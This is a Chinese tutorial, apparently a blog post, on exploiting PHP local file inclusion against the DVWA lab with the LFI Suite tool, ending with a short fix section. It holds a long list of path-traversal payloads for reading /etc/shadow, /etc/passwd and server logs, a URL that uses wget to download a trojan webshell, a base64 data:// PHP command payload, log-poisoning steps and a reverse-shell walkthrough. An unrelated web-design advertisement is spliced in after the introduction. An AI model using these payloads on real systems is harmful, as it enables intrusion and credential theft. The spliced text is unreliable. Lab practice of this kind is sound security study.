今天在公眾號看到了一個本地文件包含的利用工具，看了下國外大牛對該工具的使用的一個視頻，感覺很厲害，通過該工具可對存在本地文件包含漏洞的站點進行利用并返回一個LFI shell，通過返回的LFI shell再次獲取一個反向連接，從而可執(zhí)行相關(guān)命令，以前對本地文件包含的利用大多都停留在讀取文件，如果有遠(yuǎn)程文件包含的話就可以getshell。這篇文章主要是對本地文件包含的一個簡單介紹及利用，主要是對工具的使用，也主要是記錄下該過程，方便以后查看，然后再抽時間研究下大神源代碼！大神請繞道而行！: )

創(chuàng)新互聯(lián)服務(wù)項目包括平昌網(wǎng)站建設(shè)、平昌網(wǎng)站制作、平昌網(wǎng)頁制作以及平昌網(wǎng)絡(luò)營銷策劃等。多年來，我們專注于互聯(lián)網(wǎng)行業(yè)，利用自身積累的技術(shù)優(yōu)勢、行業(yè)經(jīng)驗、深度合作伙伴關(guān)系等，向廣大中小型企業(yè)、政府機構(gòu)等提供互聯(lián)網(wǎng)行業(yè)的解決方案，平昌網(wǎng)站推廣取得了明顯的社會效益與經(jīng)濟效益。目前，我們服務(wù)的客戶以成都為中心已經(jīng)輻射到平昌省份的部分城市，未來相信會繼續(xù)擴大服務(wù)區(qū)域并繼續(xù)獲得客戶的支持與信任！

0x01   文件包含漏洞原理

文件包含漏洞主要是程序員把一些公用的代碼寫在一個單獨的文件中，然后使用其他文件進行包含調(diào)用，如果需要包含的文件是使用硬編碼的，那么一般是不會出現(xiàn)安全問題，但是有時可能不確定需要包含哪些具體文件，所以就會采用變量的形式來傳遞需要包含的文件，但是在使用包含文件的過程中，未對包含的變量進行檢查及過濾，導(dǎo)致外部提交的惡意數(shù)據(jù)作為變量進入到了文件包含的過程中，從而導(dǎo)致提交的惡意數(shù)據(jù)被執(zhí)行。而文件包含通常分為本地文件包含（Local File Inclusion）和遠(yuǎn)程文件包含(Remote File Inclusion)。allow_url_fopen和 allow_url_include為0n的情況認(rèn)為是遠(yuǎn)程文件包含漏洞，allow_url_fopen為off和 allow_url_include為0n為本地文件包含漏洞，如圖1 配置文件所示。本次主要是利用本地文件包含，所以將allow_url_fopen設(shè)置為了off。

圖1  php.ini配置

另外文件包含漏洞主要涉及到的危險函數(shù)主要是四個：include(),require()和include_once(),require_once()。

include()：執(zhí)行到include時才包含文件，找不到被包含文件時只會產(chǎn)生警告，腳本將繼續(xù)執(zhí)行。

require()：只要程序一運行就包含文件，找不到被包含的文件時會產(chǎn)生致命錯誤，并停止腳本。

include_once()和require_once()：若文件中代碼已被包含則不會再次包含。（來自簡書）

0x02   文件包含漏洞危害

通過文件包含漏洞，可以讀取系統(tǒng)中的敏感文件，源代碼文件等，如密碼文件，通過對密碼文件進行暴力破解，若破解成功則可獲取操作系統(tǒng)的用戶賬戶，甚至可通過開放的遠(yuǎn)程連接服務(wù)進行連接控制；另外文件包含漏洞還可能導(dǎo)致執(zhí)行任意代碼，不管本地文件包含還是遠(yuǎn)程文件包含！

總之，常見的利用方法有以下三點：

一、讀取目標(biāo)主機上的其他文件，主要是本地文件包含。

二、包含可運行的網(wǎng)頁***，主要是遠(yuǎn)程文件包含，前提是"allow_url_fopen"是激活的（默認(rèn)是激活的，沒幾個人會修改）。

三、包含一個創(chuàng)建文件的相應(yīng)代碼文件，因為通過文件包含漏洞獲取的shell不是長久的，如果這個漏洞修補了，那么shell也不存在了，因此需要創(chuàng)建一個真實的shell。我們可以先包含一個可以執(zhí)行cmd的偽shell，然后使用wget加-O參數(shù)（類似：

http://x.x.x.x/index.php?page=http://www.1ster.cn/cmd.txt?cmd=wgethttp://x.x.x.x/muma.txt -O muma.php）獲取一個真正的webshell。如果系統(tǒng)中沒有wget命令，獲取目錄不可寫，那么我們可以包含一個創(chuàng)建文件的腳本，然后通過腳本上傳***文件。

       其實除了以上三點外，應(yīng)該還有一點就是執(zhí)行任意命令！

0x03   實驗環(huán)境

本次實驗環(huán)境主要是利用dvwa平臺進行演示，如圖2所示。DVWA（Damn Vulnerable Web Application）是用PHP+MySQL編寫的一套web漏洞平臺，說簡單點就是所謂的網(wǎng)站漏洞靶機，該平臺包含了SQL注入、XSS、本地文件包含、命令執(zhí)行等一些常見的web安全漏洞，并且該平臺是開源的，可以從官網(wǎng)直接下載。

圖2  dvwa平臺

0x04   本地文件包含利用工具

本次主要使用的是LFI SUIT本地文件包含利用工具，是一款用python2.7編寫的神器，該適用于Windows,Linux 和 OS X，并且首次使用會自動配置，自動安裝需要的模塊，該工具提供了九種不同的文件包含***模塊，如圖3所示。另外當(dāng)你通過一個可利用的***獲取到一個LFI shell后，你可以通過輸入“reverseshell”命令輕易地獲得一個反向shell。但是前提是你必須讓你的系統(tǒng)監(jiān)聽反向連接，比如使用“nc –lvp port”。

圖3  九種不同的文件包含***模塊

0x05   本地文件包含讀取文件

在之前的本地文件包含漏洞中，大多數(shù)都是進行讀取文件，如linux下的密碼文件（../../../../etc/shadow以及../../../../etc/passwd），獲取讀取一些你知道物理路徑的一些文件，如圖4所示。

圖4  讀取已知路徑下的文件

以下是一些簡單的測試用例，根據(jù)實際情況進行適當(dāng)?shù)男薷摹Ｔ谏衿鞯哪夸浵乱舶撕芏鄿y試用例，可自行查看！

../../tomcat/conf/tomcat-users.xml
../
%2e%2e%2f whichtranslates to ../
%2e%2e/ whichtranslates to ../
..%2f whichtranslates to ../
%2e%2e%5c whichtranslates to ..\
%c1%1c
%c0%9v
%c0%af
..%5c../
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\'/bin/cat%20/etc/passwd\\'
\\'/bin/cat%20/etc/shadow\\'
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bo
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log      
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
../../../WEB-INF/web.xml

0x06   神器簡單獲取LFI shell

運行LFI SUIT工具及選擇***模塊

直接使用pythonlfisuite.py，如圖5所示。此時我們選擇利用功能模塊1.

圖5  運行本地文件包含利用工具

設(shè)置cookie

在我們選擇利用功能模塊1后，會提示讓我們輸入cookie，如圖6所示：

圖6  設(shè)置cookie

獲取cookie

瀏覽器F12console輸入document.cookie即可獲取到當(dāng)前cookie，如圖7所示。

圖7  獲取cookie

成功獲取LFI shell

輸入cookie后，我們隨便選擇一個***模塊試試，在此我們選擇3，選取***模塊后，我們輸入漏洞地址即可成功獲取到一個shell，如圖8所示。

圖8  成功獲取LFI shell

0x07   自動模塊獲取lfi shell

如果我們不知道那個***模塊可以返回shell，我們可以選擇自動***模塊。

圖9  自動***模塊

選擇之后我們需要選擇一個包含路徑的文件，我們選擇當(dāng)前目錄下的一個文件即可。

圖10  選擇文件

選擇文件后該工具會嘗試可能性的路徑，并且加以利用。

圖11 選擇文件

如圖12所示，我們成功獲取了一個shell。

圖12 成功獲取shell

0x08   獲取一個反向連接

在我們已經(jīng)獲取到的lfishell后，我們可以使用reverseshell來獲取一個反向連接，我們先進行監(jiān)聽反向連接，如圖13所示。

圖13 設(shè)置監(jiān)聽反向連接

我們輸入reverseshell后設(shè)置ip即可

圖14 設(shè)置ip及端口

此時我們也成功獲取到了一個反向連接，如圖15所示。

圖15  獲取到反向連接

0x09   掃描模塊

另外我們也可以先使用掃描模塊，然后在選擇對應(yīng)的***模塊也能成功獲取到LFI shell。使用方法與上面都是一樣的，再次就不再進行描述了。

0x10   ***模塊簡單介紹

這里主要是利用PHP的一些函數(shù)及偽協(xié)議的使用，通過查看PHP幫助文檔對這些模塊進行復(fù)現(xiàn)，與源代碼中的利用存在一定的差異，參考文檔。由于能力有限，其中兩個模塊完全失敗，/proc/self/fd以及phpinfo模塊，看了源代碼應(yīng)該是利用phpinfo的一個注入來上傳一個包含PHP的代碼，從而進行實現(xiàn)，但是沒有利用成功。編程水平太差，誰能救救我！

/proc/self/environ

通過訪問http://127.0.0.1/vulnerabilities/fi/?page=../../../../../../../../proc/self/environ查看是否可以包含/proc/self/environ文件，如果返回了環(huán)境變量信息則說明可以訪問，如果返回為空，那么一般是無法訪問。通過判斷可以訪問后，然后向User-Agent頭中注入PHP代碼（如）進行***，如果代碼被成功注入到User-Agent頭中，通過重新加載環(huán)境變量，最后會執(zhí)行你的PHP代碼。由于無法添加該文件的訪問權(quán)限，因此沒有復(fù)現(xiàn)成功，另外需要主機是linux！

php://filter

php://filter是PHP語言中特有的協(xié)議流，作用是作為一個“中間流”來處理其他流，因此我們可以結(jié)合php://input（見下文）來執(zhí)行PHP代碼，如圖16，另外也可以將執(zhí)行后的結(jié)果進行base64編碼輸入，如圖17。

圖16    php://filter執(zhí)行PHP代碼

圖17    php://filter執(zhí)行PHP代碼base64輸出

php://input

通過使用php://input然后輸入PHP代碼，然后就可以進行包含輸入的PHP代碼，如圖18所示，也可以通過PHP代碼進行wget一個***文件，從而可獲取一個webshell。但是使用該模塊，必須開啟包含url功能！

圖18    php://input執(zhí)行PHP代碼

/proc/self/fd

不知道如何利用，如果大牛路過，煩請多多指教！

access_log

這里主要是利用日志文件，我們訪問的get請求以及User-Agent會記錄到日志中，然后就可以構(gòu)造一句話訪問，如圖19，也可以寫在User-Agent中，通過連接日志文件即可獲取到一句話，執(zhí)行PHP代碼，如圖20，但是這里需要保證對日志文件有訪問權(quán)限，并且知道日志文件路勁，否則不能成功，可以先包含日志文件，看有沒有內(nèi)容，如果沒有內(nèi)容一般就是不能訪問！

圖19   將PHP代碼寫入到日志中

圖20   包含含有PHP代碼的日志文件

phpinfo

通過查看源代碼，好像是通過phpinfo注入，偽造提交一個含有PHP代碼的文件，從而執(zhí)行PHP代碼，嘗試了下依舊不成功，哎，，，，，有時間繼續(xù)研究，路過的你知道的話，請多多指教！

data://

這里主要是使用data://來打印內(nèi)容，使用base64加密，如進行base64編碼，如圖21所示，然后使用data://來進行包含PHP代碼，data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==，從而可執(zhí)行PHP代碼，如圖22。詳情請點擊此處。

圖21  對PHP代碼進行base64編碼

圖22  執(zhí)行PHP代碼

expect://

expect://主要是用于處理交互式的流，由 expect:// 封裝協(xié)議打開的數(shù)據(jù)流 PTY 提供了對進程 stdio、stdout 和 stderr 的訪問。該封裝協(xié)議默認(rèn)未開啟，為了使用expect:// 封裝器，你必須安裝PECL 上的Expect 擴展。由于某些原因，此模塊也沒有復(fù)現(xiàn)成功，另外該封裝協(xié)議默認(rèn)不開啟，所以也沒有花時間進行復(fù)現(xiàn)了！詳情參考。

0x11   總結(jié)與修復(fù)

本文主要是對文件包含做了一個簡單的介紹，如文件包含漏洞的簡單原理及危害，最重要的是對本地文件包含漏洞的進一步利用，通過本地文件包含漏洞，從而獲取到一個反向連接或者是LFI shell。通過本文也讓自己對本地文件包含的危害和利用都有了一定的提高，不在是只停留在讀取文件上！

通過對該漏洞的利用，最安全的是設(shè)置allow_url_fopen和 allow_url_include為0ff，這樣就不能利用該漏洞了，另一方面可以做白名單限制，相當(dāng)于是硬編碼，直接把需要包含的文件固定死，這樣既不會影響業(yè)務(wù)，也不會很輕松被利用，其次還是對用戶的輸入保持懷疑態(tài)度，對用戶的輸入變量進行嚴(yán)格的檢查及過濾！